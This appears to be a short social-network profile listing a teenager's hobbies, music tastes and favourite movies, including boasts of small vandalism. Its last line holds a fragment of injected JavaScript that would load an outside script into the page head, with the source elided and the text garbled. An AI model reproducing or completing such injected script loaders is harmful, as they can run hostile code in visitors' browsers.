Off Roading, Drag Racing, Girls, Working on my 52 Ford Pickup, Hangin out with my friends, Going to the beach, Distructive things such as (TPing,Port-a-Potty tipping,Trowing Rocks at signs, & Anything else that amuses me)Playing my guitar, Football, Listing to music, Jestskis. I also Love taking pictures. It is calm and puts me in a good mood.
I am open to many diffrent kinds of music. I like rap, country, rock, R&B, and Alt. Rock! I play the guitar and the drums.
Dont have one favotire but I love action and funny movies
What a dork! .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"..